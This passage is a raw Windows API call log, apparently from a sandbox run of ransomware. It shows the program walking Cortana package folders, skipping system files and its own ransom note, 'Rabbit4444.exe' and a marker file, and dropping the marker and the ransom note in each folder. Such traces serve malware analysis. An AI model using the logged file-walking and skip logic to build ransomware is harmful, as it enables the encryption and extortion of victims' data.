lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x83, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x83, lpOverlapped=0x0) returned 1 [0067.114] CloseHandle (hObject=0x27c) returned 1 [0067.114] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0067.115] CloseHandle (hObject=0x0) returned 0 [0067.115] CloseHandle (hObject=0xffffffff) returned 1 [0067.115] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbfaff70b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0067.115] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0067.115] lstrcpyW (in: lpString1=0x130ebe8, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0067.115] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0067.115] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0067.115] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0067.115] lstrlenW (lpString="Rabbit4444") returned 10 [0067.115] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0067.115] lstrlenW (lpString=".dll") returned 4 [0067.115] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0067.115] lstrlenW (lpString=".lnk") returned 4 [0067.116] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0067.116] lstrlenW (lpString=".ini") returned 4 [0067.116] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0067.116] lstrlenW (lpString=".sys") returned 4 [0067.116] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0067.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0067.116] GetLastError () returned 0x20 [0067.116] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1 _CreateFile error 32\r\n") returned 136 [0067.116] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG1 _CreateFile error 32\r\n") returned 136 [0067.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.116] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x169b [0067.116] WriteFile (in: hFile=0x27c, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x88, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x88, lpOverlapped=0x0) returned 1 [0067.118] CloseHandle (hObject=0x27c) returned 1 [0067.118] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0067.118] CloseHandle (hObject=0x0) returned 0 [0067.118] CloseHandle (hObject=0xffffffff) returned 1 [0067.118] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbfaff70b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0067.118] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0067.119] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0067.119] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0067.119] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0067.119] lstrcpyW (in: lpString1=0x130ebe8, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0067.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0067.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0067.119] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0067.119] lstrlenW (lpString="Rabbit4444") returned 10 [0067.119] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0067.119] lstrlenW (lpString=".dll") returned 4 [0067.119] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0067.119] lstrlenW (lpString=".lnk") returned 4 [0067.119] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0067.119] lstrlenW (lpString=".ini") returned 4 [0067.119] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0067.119] lstrlenW (lpString=".sys") returned 4 [0067.120] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0067.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\settings.dat.log2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0067.120] GetLastError () returned 0x20 [0067.120] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2 _CreateFile error 32\r\n") returned 136 [0067.120] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2 _CreateFile error 32\r\n") returned 136 [0067.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.120] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1723 [0067.120] WriteFile (in: hFile=0x27c, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x88, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x88, lpOverlapped=0x0) returned 1 [0067.122] CloseHandle (hObject=0x27c) returned 1 [0067.122] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0067.122] CloseHandle (hObject=0x0) returned 0 [0067.122] CloseHandle (hObject=0xffffffff) returned 1 [0067.122] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbfaff70b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0067.122] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0067.123] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.123] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.123] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.124] CloseHandle (hObject=0x27c) returned 1 [0067.124] CloseHandle (hObject=0x228) returned 1 [0067.124] GetCurrentThreadId () returned 0xd98 [0067.124] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0067.124] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState" [0067.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f00 | out: hHeap=0xe0000) returned 1 [0067.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0067.124] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState" [0067.124] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\" [0067.124] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0067.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.126] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.129] FlushFileBuffers (hFile=0x228) returned 1 [0067.130] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.131] CloseHandle (hObject=0x228) returned 1 [0067.131] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState") returned 91 [0067.131] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.131] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd082fb18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0067.131] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.131] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.131] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.132] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd082fb18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.132] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.132] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.132] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.132] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.132] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15582d9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15582d9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.132] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.132] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.132] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15582d9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15582d9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0067.132] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0067.132] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.132] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.133] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.133] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.133] CloseHandle (hObject=0x27c) returned 1 [0067.133] CloseHandle (hObject=0x228) returned 1 [0067.133] GetCurrentThreadId () returned 0xd98 [0067.133] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0067.133] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState" [0067.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122d80 | out: hHeap=0xe0000) returned 1 [0067.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0067.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState" [0067.133] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\" [0067.133] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0067.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.134] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.137] FlushFileBuffers (hFile=0x228) returned 1 [0067.138] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.138] CloseHandle (hObject=0x228) returned 1 [0067.138] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState") returned 89 [0067.138] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.138] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0067.139] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.139] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.139] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.139] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf15582d9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.139] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.139] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.139] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.139] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.139] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.139] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf15582d9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf15582d9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf157e423, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.139] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbccaaf2e, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x97842c35, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x97842c35, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppIconCache", cAlternateFileName="APPICO~1")) returned 1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", 